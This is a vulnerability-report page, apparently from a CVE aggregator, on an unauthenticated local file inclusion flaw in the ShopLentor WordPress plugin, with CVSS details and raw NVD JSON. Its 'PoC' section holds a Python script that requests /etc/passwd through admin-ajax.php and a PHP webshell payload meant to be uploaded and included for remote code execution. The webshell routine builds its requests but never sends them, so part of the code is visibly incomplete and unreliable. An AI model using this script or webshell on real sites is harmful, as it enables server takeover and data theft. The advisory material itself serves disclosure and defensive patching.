Security Vulnerability Report
中文
CVE-2025-12493 CVSS 9.8 CRITICAL

CVE-2025-12493

Published: 2025-11-04 12:15:37
Last Modified: 2025-11-26 14:41:40
Source: [email protected]

Description

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.2.5 via the 'load_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hasthemes:shoplentor:*:*:*:*:*:wordpress:*:* - VULNERABLE
ShopLentor (WooLentor) <= 3.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12493 PoC - ShopLentor LFI Vulnerability # Target: WordPress site with ShopLentor plugin <= 3.2.5 TARGET = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # LFI via load_template function # Attack vector: Include arbitrary .php files def exploit_lfi(target, filename='/etc/passwd'): """Exploit local file inclusion via load_template""" endpoint = f"{target}/wp-admin/admin-ajax.php" # Payload for LFI via wl_load_template action data = { 'action': 'wl_load_template', 'file': filename # Path traversal possible } print(f"[*] Targeting: {target}") print(f"[*] Requesting file: {filename}") try: response = requests.post(endpoint, data=data, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code == 200 and 'root:' in response.text: print("[!] VULNERABLE - File inclusion successful!") print(response.text[:500]) return True else: print("[-] Target may not be vulnerable") return False except Exception as e: print(f"[-] Error: {e}") return False # Alternative: Upload and include webshell def upload_and_include(target, webshell_path): """Upload PHP shell and include it for RCE""" upload_endpoint = f"{target}/wp-admin/admin-ajax.php" # Upload malicious file files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')} data = {'action': 'woolentor_upload_file'} # Then include the uploaded file include_data = { 'action': 'wl_load_template', 'file': '/path/to/uploaded/shell.php' } print("[*] Uploading webshell...") print("[*] Including uploaded file for RCE...") if __name__ == '__main__': print("CVE-2025-12493 PoC - ShopLentor LFI") exploit_lfi(TARGET, '/etc/passwd')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12493", "sourceIdentifier": "[email protected]", "published": "2025-11-04T12:15:36.957", "lastModified": "2025-11-26T14:41:39.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.2.5 via the 'load_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hasthemes:shoplentor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.2.6", "matchCriteriaId": "933798AC-CE46-4823-80D4-4E91DA26FCA8"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L213", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L241", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L42", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/addons/product-grid/base/class.product-grid-base.php#L378", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3388234/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/12bb4bb9-e908-43ad-8fb1-59418580f5e1?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.